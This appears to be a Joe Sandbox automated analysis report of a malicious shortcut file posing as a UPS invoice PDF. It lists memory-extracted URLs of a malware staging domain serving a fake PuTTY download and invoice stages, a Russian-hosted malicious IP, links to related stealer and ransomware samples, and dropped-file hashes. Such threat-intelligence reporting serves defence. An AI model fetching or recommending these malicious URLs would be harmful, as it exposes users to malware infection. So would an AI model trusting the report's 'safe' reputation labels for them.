    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    http://ocsp.sectigo.com0powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...wmshta.exe, 00000004.00000003.1787060368.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793563743.0000023F9A1A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788076442.0000023F9A1A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A19E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790777524.0000023F9A1A3000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage6mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/putty.exeppowershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/Licensepowershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/Iconpowershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagegsmshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    http://crl.ver)svchost.exe, 00000006.00000002.2769097256.00000253D7800000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageC:mshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792606600.00000237976B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1787859516.00000237976AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://g.live.com/odclientsettings/ProdV2/C:svchost.exe, 00000006.00000003.1556558495.00000253D7630000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageHmshta.exe, 00000004.00000002.1792236967.0000023797580000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    https://www.chiark.greenend.org.uk/~sgtatham/putty/0powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagehttps://nebulaquestcorporation.cc/cdnusa/invmshta.exe, 00000004.00000003.1789392993.0000023F9FAA3000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageMImshta.exe, 00000004.00000002.1792396309.00000237975C0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/upsinvoice.pdf0powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://www.chiark.greenend.org.uk/~sgtatham/putty/powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe, putty.exe, 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe, 0000000C.00000000.1637581496.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp, putty.exe.7.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageLE_STRINGjmshta.exe, 00000004.00000002.1792262251.0000023797590000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.drfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.ccpowershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:?powershell.exefalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageYYC:mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage.mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://aka.ms/pscore68powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstageroforfiles.exe, 00000001.00000002.1527302987.00000229F2D10000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/Imshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://nebulaquestcorporation.cc/cdnusa/invoiceupsstagees#Mmshta.exe, 00000004.00000002.1792396309.00000237975E6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    5.188.88.146
    		nebulaquestcorporation.ccRussian Federation
    		34665PINDC-ASRUtrue
    104.77.220.172
    		unknownUnited States
    		16625AKAMAI-ASUSfalse

    Private

    IP
    127.0.0.1

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1466029
    Start date and time:2024-07-02 12:46:12 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 10s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:21
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Invoice-UPS-218931.pdf.lnk.mal.lnk
    Detection:MAL
    Classification:mal100.evad.winLNK@27/54@1/3
    EGA Information:
    • Successful, ratio: 33.3%
    HCA Information:
    • Successful, ratio: 90%
    • Number of executed functions: 46
    • Number of non-executed functions: 163
    Cookbook Comments:
    • Found application associated with file extension: .lnk

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 184.28.88.176, 18.207.85.246, 107.22.247.231, 54.144.73.197, 34.193.227.236, 162.159.61.3, 172.64.41.3, 95.101.54.195, 2.16.202.123, 2.19.126.149, 2.19.126.143, 2.22.242.11, 2.22.242.123
    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, identrust.edgesuite.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, a1952.dscq.akamai.net, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, apps.identrust.com
    • Execution Graph export aborted for target mshta.exe, PID 4996 because there are no executed function
    • Execution Graph export aborted for target powershell.exe, PID 4620 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    06:47:21API Interceptor2x Sleep call for process: svchost.exe modified
    06:47:22API Interceptor1x Sleep call for process: mshta.exe modified
    06:47:22API Interceptor37x Sleep call for process: powershell.exe modified
    06:47:39API Interceptor1x Sleep call for process: AcroCEF.exe modified

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    5.188.88.146MOD_200.pdf.lnkGet hashmaliciousArc StealerBrowse
      104.77.220.172phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
        https://www.grosfichiers.com/qfurMCm3fddGet hashmaliciousUnknownBrowse
          #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
            Document PPS 430092.docxGet hashmaliciousUnknownBrowse
              Comprobante.xlaGet hashmaliciousUnknownBrowse
                DHLR000698175.docxGet hashmaliciousUnknownBrowse
                  Payment advice.xlsGet hashmaliciousUnknownBrowse

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    PINDC-ASRUMOD_200.pdf.lnkGet hashmaliciousArc StealerBrowse
                    • 5.188.88.146
                    http://www.thisisatest29475728.com/reply283/secure/start.phpGet hashmaliciousUnknownBrowse
                    • 91.215.85.79
                    SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                    • 91.215.85.135
                    http://tinyurI.com/bn229tanGet hashmaliciousUnknownBrowse
                    • 5.188.88.20
                    http://raablogistics.comGet hashmaliciousUnknownBrowse
                    • 5.188.88.20
                    https://apidevst.com/Get hashmaliciousUnknownBrowse
                    • 5.188.88.20
                    Ransom.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                    • 91.215.85.135
                    skid.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 80.87.206.123
                    skid.x86.elfGet hashmaliciousMirai, GafgytBrowse
                    • 80.87.206.123
                    skid.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                    • 80.87.206.123
                    AKAMAI-ASUSPG96120000311.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                    • 23.47.168.24
                    https://us02web.zoom.us/webinar/register/6317193087387/WN_wbycs5lISL2eo8rEP6qUDg#/registrationGet hashmaliciousUnknownBrowse
                    • 23.50.131.159
                    Absa.pdfGet hashmaliciousHTMLPhisherBrowse
                    • 23.47.168.24
                    PUGPDU-64096.docxGet hashmaliciousHTMLPhisherBrowse
                    • 184.28.90.27
                    Absa.pdfGet hashmaliciousUnknownBrowse
                    • 23.47.168.24
                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                    • 92.122.18.57
                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                    • 92.122.18.57
                    https://app.smartsheet.com/b/download/att/1/4551989320961924/a9qsrcukwyvga6dsz82rixnmpgGet hashmaliciousHTMLPhisherBrowse
                    • 23.56.162.185
                    https://worker-aliggggg.farnazmonsef1.workers.dev/Get hashmaliciousUnknownBrowse
                    • 2.19.244.157
                    https://cloudflare-workers-pages-vless-2gi.pages.dev/Get hashmaliciousUnknownBrowse
                    • 2.19.104.10

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    3b5074b1b5d032e5620f69f9f700ff0eIF10339.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    https://ddec1-0-en-ctp.trendmicro.com:443/wis/clicktime/v1/query?url=https%3a%2f%2faagt%2damx%2dmoodle%2dmex.com%2freport%2finsights%2faction.php%3faction%3duseful%26forwardurl%3dhttps%253A%252F%252Faagt%2damx%2dmoodle%2dmex.com%252Freport%252Finsights%252Fdone.php%253Factionvisiblename%253D%2525C3%25259Atil%2526target%253D%5fblank%26predictionid%3d1580&umid=dfe32622-5afa-43d1-bc88-1d0d19378d86&auth=b37f34d438b54d6822929a8430f2a42f374caac4-c52e46d07bf23779234fc7b6680559fd6de91ad8Get hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    http://wiki.hoeron.com/doku.php?id=hoeron:kb:hardware:fortinet:2023-11-29-1701246124Get hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    purchase order - PO-011024-201.exeGet hashmaliciousAgentTeslaBrowse
                    • 5.188.88.146
                    https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                    • 5.188.88.146
                    https://scanner.topsec.com/?d=3744&r=auto&u=https%3A%2F%2Fmaknastudio.com%2Fpkyos&t=a4fe2e96fe6815a71cc8a7f1ae1196e6fbcf1f08Get hashmaliciousHTMLPhisherBrowse
                    • 5.188.88.146
                    3z5nZg91qJ.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 5.188.88.146
                    http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CxFHH8i5A3U7lzl-2BTzhlR6ei7mav1762I-2BKvT-2Fk6a5kJfjpj9RJPK9q48Ck5mSzSlgwV-2BsscO5sphM5t-2BVSr5yuCYcPokWOxF7VJFLVcuGxe55FXxdx2OWqy1uhpoEHKlprCsCZc7-2FzwTpK7gWkfISgE1dm3DNZag7jRcJoAY96XjRqTOiYZpVCYj4WczYZatXIFKlGImVUX-2BtzacIIXUkQ-3D-3Dxdxc_PRiWw-2BWerOwUL-2FYAA-2FiwxOm-2BJW3ubqhGFJ5iVqhmG217gfj9KgzNOSRNluvFvYbWIHUd-2ByAsKYpybXBhPgqT-2F1WfaNjyxdi-2FNqxuKfkiep8TocNXSydFj2bAYBLtB5MEDItgpH6g-2FV3171HTXrzYHtaSp7MB2B8WILdzxuyybTMsChhP3QdW9m4oU0X1zagLaXiyfnb7qkeR5CYT3FajfA-3D-3DGet hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 5.188.88.146
                    Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousGuLoaderBrowse
                    • 5.188.88.146
                    37f463bf4616ecd445d4a1937da06e19IF10339.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    Video%20HD%20%281080p%29.lnk.mal.lnkGet hashmaliciousUnknownBrowse
                    • 5.188.88.146
                    file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                    • 5.188.88.146
                    1Bj6BoXV3z.exeGet hashmaliciousCobaltStrikeBrowse
                    • 5.188.88.146
                    pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
                    • 5.188.88.146
                    Revised Invoice 7389293.vbsGet hashmaliciousGuLoader, RemcosBrowse
                    • 5.188.88.146
                    Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                    • 5.188.88.146
                    Build.exeGet hashmaliciousDBatLoader, NeshtaBrowse
                    • 5.188.88.146
                    F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                    • 5.188.88.146
                    1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                    • 5.188.88.146

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                    Download File
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1310720
                    Entropy (8bit):0.8022017747623389
                    Encrypted:false
                    SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAc:RJE+Lfki1GjHwU/+vVhWqpB
                    MD5:D4B9E99AEB6B53719A43EFAD2B77B278
                    SHA1:F1627A93A3E79D253D872EECA9018B020D72DE56
                    SHA-256:56F4AF664C36457F97FBF8A8DB0AF427B496349912CCB6D759380911C1B63119
                    SHA-512:28232FE794C3587C7B4FC3D3E9FE627B902DE4668C07424E6A6CCC69407BB2735A7F9170C79E58E8A0DD837CF988AA99F10258D726A7C7E130A380C261BAE4ED
                    Malicious:false
                    Reputation:low
                    Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                    Download File
                    Process:C:\Windows\System32\svchost.exe
                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x12d8488c, page size 16384, DirtyShutdown, Windows version 10.0
                    Category:dropped
                    Size (bytes):1048576
                    Entropy (8bit):0.9433228177600054
                    Encrypted:false
                    SSDEEP:1536:7SB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:7azaHvxXy2V2UR
                    MD5:B6B3296F945B555E07492434ED77B16A
                    SHA1:232383EAC55C92CDF121CA6C5C0C62D849B12681
                    SHA-256:1C136E61674DBCBED8BD16401D814EAF9B8276BA94D5F0BEF7188A183D181E7D
                    SHA-512:D7D8EAD1037CF90F4D36EA5AD521EFED540F53B5AEE2E76BDD6BDE888DEA2E69796DE9FD8027B089727356B3A7ACDF48A66F21D51AF49593E53BF462D2AF5629
                    Malicious:false
                    Reputation:low
                    Preview:..H.... ...............X\...;...{......................0.x...... ...{s../...|..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................:..y./...|...................7U./...|...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                    Download File
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.08099323468159275
                    Encrypted:false
                    SSDEEP:3:jN8YeH7Wsl/nqlFcl1ZUlllly//llallGBnX/l/Tj/k7/t:+zHisl/qlFclQ/lMtA254
                    MD5:EA6CC3C13555976F6BC9921C31F2FFDD
                    SHA1:904416D0DE24D2CF00786DE47728FD1142B79BED
                    SHA-256:9F04BADB7CD5753E08D793397610778A3A540DB8D0C320CD2A842F68CA124B22
                    SHA-512:D97F285FB77A657B92DF6FEDC696D8E1B416762F58EB05D73ACDD70F89E462E3C4390B2959FB617EF8493CE3FE4C753BEDF6A66ED29DD14BB5977C5F889B9552
                    Malicious:false
                    Preview:$.U......................................;...{.../...|... ...{s.......... ...{s.. ...{s.P.... ...{s...................7U./...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.211007898514494
                    Encrypted:false
                    SSDEEP:6:BOAqVDM+q2PCHhJ2nKuAl9OmbnIFUt84OAeVgZmw+4OAeVDMVkwOCHhJ2nKuAl91:EA6M+vBHAahFUt81AT/+1AuMV56HAaSJ
                    MD5:749166A04034B8DDCFA6FF3189DF327D
                    SHA1:0720838C052AC6DF7CA39B065B7D95981C05100E
                    SHA-256:5145B185DF25F17FF5A7A31B152C6CD29F13387ECE379B0D06D3DBD2C408E42D
                    SHA-512:BB2A36F57F32D412B167E96AE873D2D09969EC53A72C981F369A9D7C16ED7D68043B0CF46612BB3DA71873D973C29835BE3395EB1154B46A5B175F357A609584
                    Malicious:false
                    Preview:2024/07/02-06:47:26.631 1cfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/02-06:47:26.635 1cfc Recovering log #3.2024/07/02-06:47:26.635 1cfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):294
                    Entropy (8bit):5.211007898514494
                    Encrypted:false
                    SSDEEP:6:BOAqVDM+q2PCHhJ2nKuAl9OmbnIFUt84OAeVgZmw+4OAeVDMVkwOCHhJ2nKuAl91:EA6M+vBHAahFUt81AT/+1AuMV56HAaSJ
                    MD5:749166A04034B8DDCFA6FF3189DF327D
                    SHA1:0720838C052AC6DF7CA39B065B7D95981C05100E
                    SHA-256:5145B185DF25F17FF5A7A31B152C6CD29F13387ECE379B0D06D3DBD2C408E42D
                    SHA-512:BB2A36F57F32D412B167E96AE873D2D09969EC53A72C981F369A9D7C16ED7D68043B0CF46612BB3DA71873D973C29835BE3395EB1154B46A5B175F357A609584
                    Malicious:false
                    Preview:2024/07/02-06:47:26.631 1cfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/02-06:47:26.635 1cfc Recovering log #3.2024/07/02-06:47:26.635 1cfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                    Download File
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):338
                    Entropy (8bit):5.179901915938386
                    Encrypted:false
                    SSDEEP:6:BOABAq2PCHhJ2nKuAl9Ombzo2jMGIFUt84OAimZmw+4OA6/kwOCHhJ2nKuAl9OmT:EAKvBHAa8uFUt81Aim/+1A6/56HAa8RJ
                    MD5:86E9E93D59D4CDBE591FA91D764A0264
                    SHA1:26F4316DFB67848C3BD3EADAE42EF56BDE401A75
                    SHA-256:AB51C6FFCD10064D28E05DA9BAC79D445AE5F80151252EC85C84434FC2949B8E
